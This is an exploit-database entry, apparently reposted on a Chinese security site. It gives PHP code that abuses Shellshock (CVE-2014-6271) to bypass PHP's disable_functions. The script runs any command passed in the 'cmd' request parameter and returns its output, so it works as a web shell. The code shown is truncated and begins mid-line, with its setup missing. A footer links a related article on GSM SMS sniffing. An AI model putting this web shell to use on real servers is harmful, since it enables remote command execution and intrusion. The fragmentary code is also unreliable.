PHP 5.x - Bypass Disable Functions (via Shellshock)

# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
# Google Dork: none
# Date: 10/31/2014
# Exploit Author: Ryan King (Starfall)
# Vendor Homepage: http://php.net
# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
# Version: 5.* (tested on 5.6.2)
# Tested on: Debian 7 and CentOS 5 and 6
# CVE: CVE-2014-6271

$tmp 2>&1");
     // In Safe Mode, the user may only alter environment variables 
whose names
     // begin with the prefixes supplied by this directive.
     // By default, users will only be able to set environment variables 
that
     // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is 
empty,
     // PHP will let the user modify ANY environment variable!
     mail("[email protected]","","","","-bv"); // -bv so we don't actually 
send any mail
   }
   else return "Not vuln (not bash)";
   $output = @file_get_contents($tmp);
   @unlink($tmp);
   if($output != "") return $output;
   else return "No output, or not vuln.";
}
shellshock($_REQUEST["cmd"]);
?>

source: http://www.exploit-db.com/exploits/35146/

文章来源于lcx.cc:PHP 5.x - Bypass Disable Functions (via Shellshock)

相关推荐: GSM Hackeing 之 SMS Sniffer 学习

0x00 前言 最近看到微博以及一些论坛谈论关于GSM Hacking的比较多，使用的是开源的程序 osmocombb 和摩托罗拉的手机 c118。我也凑凑热闹，找来相关资料进行学习，国内关于这方面的资料的确太少了，大都是一些编译 osmocombb 的资料，…